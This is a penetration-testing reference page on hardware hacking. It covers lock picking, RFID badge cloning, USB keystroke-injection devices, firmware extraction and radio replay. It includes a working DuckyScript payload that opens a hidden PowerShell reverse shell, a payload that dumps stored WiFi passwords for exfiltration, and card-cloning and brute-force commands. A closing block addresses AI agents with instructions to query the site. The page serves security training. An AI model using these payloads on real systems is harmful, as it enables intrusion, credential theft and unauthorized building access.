# Hardware Hacking ## Overview Hardware security testing involves physical attacks on devices, firmware analysis, and embedded systems exploitation. ## Physical Security Testing ### Lock Picking Basics ``` # Common lock types: # - Pin tumbler locks (most common) # - Wafer locks (cheaper, easier) # - Disc detainer locks (high security) # - Tubular locks (vending machines) # Basic tools: # - Tension wrench (bottom of keyway) # - Single pin picks (hook, diamond, ball) # - Rake picks (bogota, snake, city) # - Electric pick guns (snap guns) # Technique: # 1. Insert tension wrench, apply slight rotational pressure # 2. Insert pick above tension wrench # 3. Feel for binding pin # 4. Push binding pin to shear line # 5. Repeat until all pins set # 6. Lock opens with tension # Practice locks: # - Clear/cutaway locks for learning # - Progressive pin sets # - Increasingly difficult locks ``` ### Bypass Techniques ``` # Common physical bypasses: # - Shove tools (under door) # - Latch slipping (credit card) # - Door gap tools (under door lever) # - REX (Request to Exit) sensor abuse # - Tailgating/piggybacking # Electronic lock bypasses: # - Magnet attacks on mag locks # - Shock attacks (hitting door) # - Power cutting (NC vs NO) # - Controller attacks (exposed wiring) # Key impressioning: # - Insert blank key # - Turn with force (marks binding pins) # - File marks # - Repeat until key works ``` ## RFID/NFC Attacks ### RFID Technology ``` # Frequencies: # - LF (125-134 KHz): HID, EM4100 (older access cards) # - HF (13.56 MHz): MIFARE, iClass, NFC # - UHF (860-960 MHz): Inventory tracking # Common card types: # - EM4100 (read-only, easily cloned) # - HID ProxCard II (common access cards) # - MIFARE Classic (known crypto weaknesses) # - MIFARE DESFire (more secure) # - iClass (HID, variable security) ``` ### Proxmark3 Usage ```bash # Proxmark3 - universal RFID tool # https://github.com/RfidResearchGroup/proxmark3 # Identify card type pm3 --> auto # Low Frequency (125 KHz) # Read LF card pm3 --> lf search # Clone EM4100 to T5577 pm3 --> lf em 410x clone --id 0102030405 # Read HID ProxCard pm3 --> lf hid reader # Clone HID to T5577 pm3 --> lf hid clone -r 2004263159 # Brute force HID facility codes pm3 --> lf hid brute --fc 1 --cn 1-65535 # High Frequency (13.56 MHz) # Read HF card pm3 --> hf search # MIFARE Classic attacks # Read with known keys pm3 --> hf mf autopwn # Dump card pm3 --> hf mf dump # Clone MIFARE pm3 --> hf mf cload -f dump.bin # iClass attacks pm3 --> hf iclass reader pm3 --> hf iclass dump ``` ### Flipper Zero Usage ```bash # Flipper Zero - portable multi-tool # RFID reading/emulation # Read 125 KHz card # Flipper menu: RFID -> Read # Emulate cloned card # Flipper menu: RFID -> Saved -> [card] -> Emulate # NFC reading # Flipper menu: NFC -> Read # SubGHz (garage doors, car fobs) # Read signal: SubGHz -> Read # Replay: SubGHz -> Saved -> [signal] -> Send # Brute force rolling codes (research only!) # Infrared (TV remotes) # Flipper menu: Infrared -> Read # BadUSB # Upload DuckyScript payloads via qFlipper # Flipper menu: Bad USB -> [script] ``` ### Badge Cloning Attack ```bash # Attack workflow: # 1. Identify badge type # - Visual inspection # - Proxmark3 auto-detect pm3 --> auto # 2. Capture card data # Long-range reader in elevator/turnstile # Or get close with Proxmark3 # 3. Clone to writable card # T5577 for LF # Magic MIFARE for HF pm3 --> lf hid clone -r # 4. Test cloned badge # Use at access point # Long-range readers: # - HID MaxiProx (up to 8 feet) # - Custom long-range antennas # - Concealed readers (bag/backpack) ``` ## USB Attacks ### Rubber Ducky / BadUSB ```bash # USB Rubber Ducky - keystroke injection # Appears as keyboard, types pre-programmed payloads # DuckyScript example - reverse shell # payload.txt DELAY 500 GUI r DELAY 200 STRING powershell -w hidden -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ENTER # Compile with encoder java -jar encoder.jar -i payload.txt -o inject.bin # Copy inject.bin to Ducky SD card ``` ### USB Armory / LAN Turtle ```bash # USB Armory - full Linux computer in USB form factor # Uses: # - MITM attacks # - Network implant # - Hardware security module # LAN Turtle - covert network implant # Looks like USB ethernet adapter # Features: # - Remote shell access # - Network scanning # - Credential harvesting # - DNS spoofing # Configuration via turtle shell ssh root@172.16.84.1 # Modules: # - autossh (persistent reverse shell) # - responder (credential capture) # - nmap-scan # - dns-spoof ``` ### O.MG Cable ```bash # O.MG Cable - malicious USB cable # Looks like normal charging cable # Contains WiFi-enabled implant # Features: # - Keystroke injection # - WiFi command & control # - Geofencing (activate in specific location) # - Self-destruct capability # Setup: # 1. Connect to O.MG WiFi network # 2. Access web interface (192.168.4.1) # 3. Configure payload # 4. Deploy cable # Example payload (exfil WiFi passwords) REM Windows WiFi Password Extraction GUI r DELAY 200 STRING cmd ENTER DELAY 200 STRING netsh wlan export profile key=clear folder=C:\Temp ENTER # Then exfiltrate via HTTP/DNS ``` ## IoT Testing ### Firmware Analysis ```bash # Extract firmware # From device flash chip # From vendor website # From OTA update # Using binwalk binwalk -e firmware.bin binwalk -Me firmware.bin # Matryoshka extraction # Find interesting files grep -r "password\|secret\|key" _firmware.bin.extracted/ strings firmware.bin | grep -i "admin\|root\|pass" # Analyze file system cd _firmware.bin.extracted/squashfs-root/ cat etc/passwd cat etc/shadow find . -name "*.conf" -exec grep -l "password" {} \; # Look for hardcoded credentials grep -r "ADMIN\|root:.*:\|password.*=" . # Find encryption keys find . -name "*.pem" -o -name "*.key" -o -name "*.crt" ``` ### UART/Serial Access ```bash # UART = Universal Asynchronous Receiver/Transmitter # Common debug interface on IoT devices # Identifying UART pins: # - GND: Connect multimeter to known ground # - VCC: Usually 3.3V or 5V # - TX: Fluctuates when device boots # - RX: Stable, connected to input # Tools: # - USB to TTL adapter (FTDI, CP2102) # - Logic analyzer # - JTAGulator (automated pin finding) # Connection (115200 baud is common) screen /dev/ttyUSB0 115200 # or minicom -D /dev/ttyUSB0 -b 115200 # Common baud rates: 9600, 19200, 38400, 57600, 115200 # Look for: # - Boot loader access (U-Boot) # - Root shell # - Debug information ``` ### JTAG/SWD Debug ```bash # JTAG = Joint Test Action Group (debug interface) # SWD = Serial Wire Debug (ARM alternative) # Identifying JTAG pins: # - TDI (Test Data In) # - TDO (Test Data Out) # - TMS (Test Mode Select) # - TCK (Test Clock) # - TRST (Test Reset - optional) # Tools: # - JTAGulator # - Bus Pirate # - FT2232H breakout # - Segger J-Link # Using OpenOCD openocd -f interface/jlink.cfg -f target/stm32f1x.cfg # Connect with GDB arm-none-eabi-gdb (gdb) target remote :3333 (gdb) monitor reset halt (gdb) x/100x 0x08000000 # Dump flash # Extract firmware via JTAG dump_image firmware.bin 0x08000000 0x10000 ``` ### SPI Flash Extraction ```bash # SPI flash chips store firmware # Can be read directly with hardware # Tools: # - SPI flash programmer (CH341A) # - Bus Pirate # - Raspberry Pi # Identify chip: # Look for 8-pin chip (SOIC-8) # Read markings (e.g., W25Q64, MX25L128) # Using flashrom with CH341A flashrom -p ch341a_spi -r firmware_dump.bin # Using Bus Pirate flashrom -p buspirate_spi:dev=/dev/ttyUSB0 -r firmware.bin # Verify dump integrity flashrom -p ch341a_spi -v firmware_dump.bin # Analyze extracted firmware binwalk -e firmware_dump.bin ``` ## Wireless Analysis ### SDR (Software Defined Radio) ```bash # SDR allows analyzing radio frequencies # Hardware: # - RTL-SDR (~$25) # - HackRF One (~$300) # - YARD Stick One (sub-GHz) # - Ubertooth (Bluetooth) # Install tools apt install gqrx-sdr rtl-sdr gnuradio # Scan frequencies gqrx # Record signal rtl_sdr -f 433920000 -s 2000000 capture.bin # Analyze with Universal Radio Hacker (URH) # https://github.com/jopohl/urh urh # Replay attacks # Capture signal -> Analyze -> Replay # Works on simple systems (garage doors, doorbells) ``` ### Zigbee/Z-Wave ```bash # Zigbee (2.4 GHz) - smart home protocol # Z-Wave (908 MHz US / 868 MHz EU) # Zigbee analysis with Killerbee # https://github.com/riverloopsec/killerbee # Sniff Zigbee traffic zbstumbler zbdump -c 11 -w capture.pcap # Replay Zigbee packets zbreplay -r capture.pcap # Z-Wave analysis # Requires Z-Wave controller (Zniffer) # Look for unencrypted traffic ``` ## Tools Reference ```bash # Hardware tools: # - Proxmark3 (RFID/NFC) # - Flipper Zero (multi-tool) # - USB Rubber Ducky # - Bash Bunny # - LAN Turtle # - O.MG Cable # - HackRF One (SDR) # - YARD Stick One # - Ubertooth (Bluetooth) # - Bus Pirate # - JTAGulator # - Logic Analyzer # Software: # - binwalk (firmware analysis) # - firmwalker (firmware analysis) # - flashrom (SPI flash) # - OpenOCD (JTAG/SWD) # - GNU Radio (SDR) # - URH (Universal Radio Hacker) # - Killerbee (Zigbee) # Resources: # - https://github.com/adi0x90/attifyos # - https://www.pentestpartners.com/security-blog/ # - https://rtl-sdr.com/ ``` ## Resources * [Hardware Hacking Handbook](https://nostarch.com/hardwarehacking) * [Practical IoT Hacking](https://nostarch.com/practical-iot-hacking) * [OWASP IoT Project](https://owasp.org/www-project-internet-of-things/) * [Attify Blog](https://blog.attify.com/) * [/dev/ttyS0 Hardware Hacking](https://www.devttys0.com/) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.pentest-book.com/others/hardware.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.